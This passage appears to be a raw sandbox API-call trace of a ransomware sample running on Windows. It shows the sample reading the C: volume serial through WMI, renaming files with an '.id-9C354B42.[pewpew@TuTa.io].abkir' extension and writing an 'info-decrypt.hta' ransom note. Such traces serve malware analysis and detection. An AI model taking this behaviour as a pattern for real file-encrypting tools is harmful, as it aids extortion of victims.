ppvObject=0x6d8e664*=0xb5b6f4) returned 0x0 [0157.011] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b6f4, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6d8e620 | out: ppvObject=0x6d8e620*=0x0) returned 0x80004002 [0157.235] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b6f4, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6d8e43c | out: ppvObject=0x6d8e43c*=0x0) returned 0x80004002 [0157.236] WbemLocator:IUnknown:AddRef (This=0xb5b6f4) returned 0x3 [0157.236] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b6f4, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6d8df7c | out: ppvObject=0x6d8df7c*=0x0) returned 0x80004002 [0157.237] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b6f4, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6d8df2c | out: ppvObject=0x6d8df2c*=0x0) returned 0x80004002 [0157.502] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b6f4, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8df38 | out: ppvObject=0x6d8df38*=0xb5b654) returned 0x0 [0157.503] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0xb5b654, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6d8df40 | out: pCid=0x6d8df40*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0157.503] WbemLocator:IUnknown:Release (This=0xb5b654) returned 0x3 [0157.503] CoGetContextToken (in: pToken=0x6d8df98 | out: pToken=0x6d8df98) returned 0x0 [0157.503] CoGetContextToken (in: pToken=0x6d8e3a0 | out: pToken=0x6d8e3a0) returned 0x0 [0157.503] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b6f4, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e430 | out: ppvObject=0x6d8e430*=0xb5b6dc) returned 0x0 [0157.503] WbemLocator:IRpcOptions:Query (in: This=0xb5b6dc, pPrx=0xb5b6f4, dwProperty=2, pdwValue=0x6d8e458 | out: pdwValue=0x6d8e458) returned 0x80004002 [0157.503] WbemLocator:IUnknown:Release (This=0xb5b6dc) returned 0x3 [0157.503] WbemLocator:IUnknown:Release (This=0xb5b6f4) returned 0x2 [0157.503] CoGetContextToken (in: pToken=0x6d8e978 | out: pToken=0x6d8e978) returned 0x0 [0157.503] CoGetContextToken (in: pToken=0x6d8e8d8 | out: pToken=0x6d8e8d8) returned 0x0 [0157.503] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b6f4, riid=0x6d8e9a8*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x6d8e9a4 | out: ppvObject=0x6d8e9a4*=0x60247c4) returned 0x0 [0157.503] WbemLocator:IUnknown:AddRef (This=0x60247c4) returned 0x4 [0157.503] WbemLocator:IUnknown:Release (This=0x60247c4) returned 0x3 [0157.503] WbemLocator:IUnknown:Release (This=0x60247c4) returned 0x2 [0157.503] SysStringLen (param_1=0x0) returned 0x0 [0157.503] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6025e60, puCount=0x6d8ed3c | out: puCount=0x6d8ed3c*=0x0) returned 0x0 [0157.503] WbemDefPath:IWbemPath:GetText (in: This=0x6025e60, lFlags=2, puBuffLength=0x6d8ed38*=0x0, pszText=0x0 | out: puBuffLength=0x6d8ed38*=0x20, pszText=0x0) returned 0x0 [0157.503] WbemDefPath:IWbemPath:GetText (in: This=0x6025e60, lFlags=2, puBuffLength=0x6d8ed38*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6d8ed38*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0157.503] CoGetContextToken (in: pToken=0x6d8e9a8 | out: pToken=0x6d8e9a8) returned 0x0 [0157.503] WbemLocator:IUnknown:AddRef (This=0xb5b6f4) returned 0x3 [0157.503] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b6f4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e83c | out: ppvObject=0x6d8e83c*=0xb5b6f4) returned 0x0 [0157.503] WbemLocator:IUnknown:Release (This=0xb5b6f4) returned 0x3 [0157.503] WbemLocator:IUnknown:Release (This=0xb5b6f4) returned 0x2 [0157.503] WbemDefPath:IWbemPath:GetText (in: This=0x6025e60, lFlags=2, puBuffLength=0x6d8ed40*=0x0, pszText=0x0 | out: puBuffLength=0x6d8ed40*=0x20, pszText=0x0) returned 0x0 [0157.503] WbemDefPath:IWbemPath:GetText (in: This=0x6025e60, lFlags=2, puBuffLength=0x6d8ed40*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6d8ed40*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0157.504] IWbemServices:GetObject (in: This=0x60247c4, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x6d8ecf4*=0x0, ppCallResult=0x0 | out: ppObject=0x6d8ecf4*=0x60287e0, ppCallResult=0x0) returned 0x0 [0157.527] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6025ed0, puCount=0x6d8ecf4 | out: puCount=0x6d8ecf4*=0x2) returned 0x0 [0157.527] WbemDefPath:IWbemPath:GetText (in: This=0x6025ed0, lFlags=4, puBuffLength=0x6d8ecf0*=0x0, pszText=0x0 | out: puBuffLength=0x6d8ecf0*=0xf, pszText=0x0) returned 0x0 [0157.527] WbemDefPath:IWbemPath:GetText (in: This=0x6025ed0, lFlags=4, puBuffLength=0x6d8ecf0*=0xf, pszText="00000000000000" | out: puBuffLength=0x6d8ecf0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0157.527] IWbemClassObject:Get (in: This=0x60287e0, wszName="VolumeSerialNumber", lFlags=0, pVal=0x6d8ecf0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x376ae9c*=0, plFlavor=0x376aea0*=0 | out: pVal=0x6d8ecf0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x376ae9c*=8, plFlavor=0x376aea0*=0) returned 0x0 [0157.527] SysStringByteLen (bstr="9C354B42") returned 0x10 [0157.527] SysStringByteLen (bstr="9C354B42") returned 0x10 [0157.527] IWbemClassObject:Get (in: This=0x60287e0, wszName="VolumeSerialNumber", lFlags=0, pVal=0x6d8ecf8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x376ae9c*=8, plFlavor=0x376aea0*=0 | out: pVal=0x6d8ecf8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x376ae9c*=8, plFlavor=0x376aea0*=0) returned 0x0 [0157.527] SysStringByteLen (bstr="9C354B42") returned 0x10 [0157.527] SysStringByteLen (bstr="9C354B42") returned 0x10 [0157.527] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE", nBufferLength=0x105, lpBuffer=0x6d8e8f8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE", lpFilePart=0x0) returned 0x3e [0157.527] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE.id-9C354B42.[pewpew@TuTa.io].abkir", nBufferLength=0x105, lpBuffer=0x6d8e8f8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE.id-9C354B42.[pewpew@TuTa.io].abkir", lpFilePart=0x0) returned 0x61 [0157.527] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8ed58) returned 1 [0157.527] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dwtrig20.exe"), fInfoLevelId=0x0, lpFileInformation=0x6d8edd4 | out: lpFileInformation=0x6d8edd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2e5e4300, ftCreationTime.dwHighDateTime=0x1cba06d, ftLastAccessTime.dwLowDateTime=0xdbe62980, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x1a25eb00, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x20)) returned 1 [0157.528] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8ed54) returned 1 [0157.528] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dwtrig20.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE.id-9C354B42.[pewpew@TuTa.io].abkir" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dwtrig20.exe.id-9c354b42.[pewpew@tuta.io].abkir")) returned 1 [0157.528] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8ee9c) returned 1 [0157.528] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION", nBufferLength=0x105, lpBuffer=0x6d8e9a4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION", lpFilePart=0x0) returned 0x37 [0157.528] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\", nBufferLength=0x105, lpBuffer=0x6d8e978, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\", lpFilePart=0x0) returned 0x38 [0157.529] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\*", lpFindFileData=0x6d8ebc4 | out: lpFindFileData=0x6d8ebc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeef015d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeef015d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7f490 [0157.641] FindNextFileW (in: hFindFile=0xb7f490, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeef015d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeef015d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0157.641] FindNextFileW (in: hFindFile=0xb7f490, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeed38550, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeed38550, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1033", cAlternateFileName="")) returned 1 [0157.641] FindNextFileW (in: hFindFile=0xb7f490, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5d107e00, ftCreationTime.dwHighDateTime=0x1bb541c, ftLastAccessTime.dwLowDateTime=0xeed5e6b0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x5d107e00, ftLastWriteTime.dwHighDateTime=0x1bb541c, nFileSizeHigh=0x0, nFileSizeLow=0x9fd, dwReserved0=0x0, dwReserved1=0x0, cFileName="EQNEDT32.CNT", cAlternateFileName="")) returned 1 [0157.641] FindNextFileW (in: hFindFile=0xb7f490, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28305200, ftCreationTime.dwHighDateTime=0x1c2f1c2, ftLastAccessTime.dwLowDateTime=0xeed5e6b0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x28305200, ftLastWriteTime.dwHighDateTime=0x1c2f1c2, nFileSizeHigh=0x0, nFileSizeLow=0x84a48, dwReserved0=0x0, dwReserved1=0x0, cFileName="EQNEDT32.EXE", cAlternateFileName="")) returned 1 [0157.641] FindNextFileW (in: hFindFile=0xb7f490, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3acd3b00, ftCreationTime.dwHighDateTime=0x1c6cca0, ftLastAccessTime.dwLowDateTime=0xeed5e6b0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x3acd3b00, ftLastWriteTime.dwHighDateTime=0x1c6cca0, nFileSizeHigh=0x0, nFileSizeLow=0x236, dwReserved0=0x0, dwReserved1=0x0, cFileName="eqnedt32.exe.manifest", cAlternateFileName="EQNEDT~1.MAN")) returned 1 [0157.642] FindNextFileW (in: hFindFile=0xb7f490, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3bd0200, ftCreationTime.dwHighDateTime=0x1be1298, ftLastAccessTime.dwLowDateTime=0xeed5e6b0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x3bd0200, ftLastWriteTime.dwHighDateTime=0x1be1298, nFileSizeHigh=0x0, nFileSizeLow=0x2b0b7, dwReserved0=0x0, dwReserved1=0x0, cFileName="EQNEDT32.HLP", cAlternateFileName="")) returned 1 [0157.642] FindNextFileW (in: hFindFile=0xb7f490, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95fd7600, ftCreationTime.dwHighDateTime=0x1bc9dc7, ftLastAccessTime.dwLowDateTime=0xeef015d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x95fd7600, ftLastWriteTime.dwHighDateTime=0x1bc9dc7, nFileSizeHigh=0x0, nFileSizeLow=0x1de8, dwReserved0=0x0, dwReserved1=0x0, cFileName="MTEXTRA.TTF", cAlternateFileName="")) returned 1 [0157.642] FindNextFileW (in: hFindFile=0xb7f490, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0157.642] FindClose (in: hFindFile=0xb7f490 | out: hFindFile=0xb7f490) returned 1 [0157.642] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8ee5c) returned 1 [0157.642] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8ee68) returned 1 [0157.642] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8ee9c) returned 1 [0157.642] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION", nBufferLength=0x105, lpBuffer=0x6d8e9a4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION", lpFilePart=0x0) returned 0x37 [0157.642] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\", nBufferLength=0x105, lpBuffer=0x6d8e978, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\", lpFilePart=0x0) returned 0x38 [0157.643] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\*", lpFindFileData=0x6d8ebc4 | out: lpFindFileData=0x6d8ebc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeef015d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeef015d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7f490 [0157.643] FindNextFileW (in: hFindFile=0xb7f490, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeef015d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeef015d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0157.643] FindNextFileW (in: hFindFile=0xb7f490, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeed38550, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeed38550, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1033", cAlternateFileName="")) returned 1 [0157.643] FindNextFileW (in: hFindFile=0xb7f490, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5d107e00, ftCreationTime.dwHighDateTime=0x1bb541c, ftLastAccessTime.dwLowDateTime=0xeed5e6b0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x5d107e00, ftLastWriteTime.dwHighDateTime=0x1bb541c, nFileSizeHigh=0x0, nFileSizeLow=0x9fd, dwReserved0=0x0, dwReserved1=0x0, cFileName="EQNEDT32.CNT", cAlternateFileName="")) returned 1 [0157.643] FindNextFileW (in: hFindFile=0xb7f490, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28305200, ftCreationTime.dwHighDateTime=0x1c2f1c2, ftLastAccessTime.dwLowDateTime=0xeed5e6b0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x28305200, ftLastWriteTime.dwHighDateTime=0x1c2f1c2, nFileSizeHigh=0x0, nFileSizeLow=0x84a48, dwReserved0=0x0, dwReserved1=0x0, cFileName="EQNEDT32.EXE", cAlternateFileName="")) returned 1 [0157.644] FindNextFileW (in: hFindFile=0xb7f490, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3acd3b00, ftCreationTime.dwHighDateTime=0x1c6cca0, ftLastAccessTime.dwLowDateTime=0xeed5e6b0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x3acd3b00, ftLastWriteTime.dwHighDateTime=0x1c6cca0, nFileSizeHigh=0x0, nFileSizeLow=0x236, dwReserved0=0x0, dwReserved1=0x0, cFileName="eqnedt32.exe.manifest", cAlternateFileName="EQNEDT~1.MAN")) returned 1 [0157.644] FindNextFileW (in: hFindFile=0xb7f490, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3bd0200, ftCreationTime.dwHighDateTime=0x1be1298, ftLastAccessTime.dwLowDateTime=0xeed5e6b0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x3bd0200, ftLastWriteTime.dwHighDateTime=0x1be1298, nFileSizeHigh=0x0, nFileSizeLow=0x2b0b7, dwReserved0=0x0, dwReserved1=0x0, cFileName="EQNEDT32.HLP", cAlternateFileName="")) returned 1 [0157.644] FindNextFileW (in: hFindFile=0xb7f490, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95fd7600, ftCreationTime.dwHighDateTime=0x1bc9dc7, ftLastAccessTime.dwLowDateTime=0xeef015d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x95fd7600, ftLastWriteTime.dwHighDateTime=0x1bc9dc7, nFileSizeHigh=0x0, nFileSizeLow=0x1de8, dwReserved0=0x0, dwReserved1=0x0, cFileName="MTEXTRA.TTF", cAlternateFileName="")) returned 1 [0157.644] FindNextFileW (in: hFindFile=0xb7f490, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95fd7600, ftCreationTime.dwHighDateTime=0x1bc9dc7, ftLastAccessTime.dwLowDateTime=0xeef015d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x95fd7600, ftLastWriteTime.dwHighDateTime=0x1bc9dc7, nFileSizeHigh=0x0, nFileSizeLow=0x1de8, dwReserved0=0x0, dwReserved1=0x0, cFileName="MTEXTRA.TTF", cAlternateFileName="")) returned 0 [0157.644] FindClose (in: hFindFile=0xb7f490 | out: hFindFile=0xb7f490) returned 1 [0157.645] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8ee5c) returned 1 [0157.645] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8ee68) returned 1 [0157.645] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE", nBufferLength=0x105, lpBuffer=0x6d8e910, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE", lpFilePart=0x0) returned 0x44 [0157.645] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6d8e918, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\info-decrypt.hta", lpFilePart=0x0) returned 0x48 [0157.645] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8ed78) returned 1 [0157.645] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\info-decrypt.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x6d8edf4 | out: lpFileInformation=0x6d8edf4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0157.645] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8ed74) returned 1 [0157.645] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE", nBufferLength=0x105, lpBuffer=0x6d8e910, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE", lpFilePart=0x0) returned 0x44 [0157.645] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6d8e7b8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\info-decrypt.hta", lpFilePart=0x0) returned 0x48 [0157.645] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8ecac) returned 1 [0157.645] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\info-decrypt.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\info-decrypt.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x31c [0157.646] GetFileType (hFile=0x31c) returned 0x1 [0157.646] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8eca8) returned 1 [0157.646] GetFileType (hFile=0x31c) returned 0x1 [0157.647] WriteFile (in: hFile=0x31c, lpBuffer=0x38e51c8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6d8ed70, lpOverlapped=0x0 | out: lpBuffer=0x38e51c8*, lpNumberOfBytesWritten=0x6d8ed70*=0x1000, lpOverlapped=0x0) returned 1 [0157.647] WriteFile (in: hFile=0x31c, lpBuffer=0x38e51c8*, nNumberOfBytesToWrite=0x55e, lpNumberOfBytesWritten=0x6d8ed44, lpOverlapped=0x0 | out: lpBuffer=0x38e51c8*, lpNumberOfBytesWritten=0x6d8ed44*=0x55e, lpOverlapped=0x0) returned 1 [0157.647] CloseHandle (hObject=0x31c) returned 1 [0157.648] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE", nBufferLength=0x105, lpBuffer=0x6d8e918, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE", lpFilePart=0x0) returned 0x44 [0157.648] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8edc4) returned 1 [0157.648] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.exe"), fInfoLevelId=0x0, lpFileInformation=0x38e61e4 | out: lpFileInformation=0x38e61e4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28305200, ftCreationTime.dwHighDateTime=0x1c2f1c2, ftLastAccessTime.dwLowDateTime=0xeed5e6b0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x28305200, ftLastWriteTime.dwHighDateTime=0x1c2f1c2, nFileSizeHigh=0x0, nFileSizeLow=0x84a48)) returned 1 [0157.687] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8edc0) returned 1 [0157.687] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE", nBufferLength=0x105, lpBuffer=0x6d8e804, lpFilePart=0x0 | out: 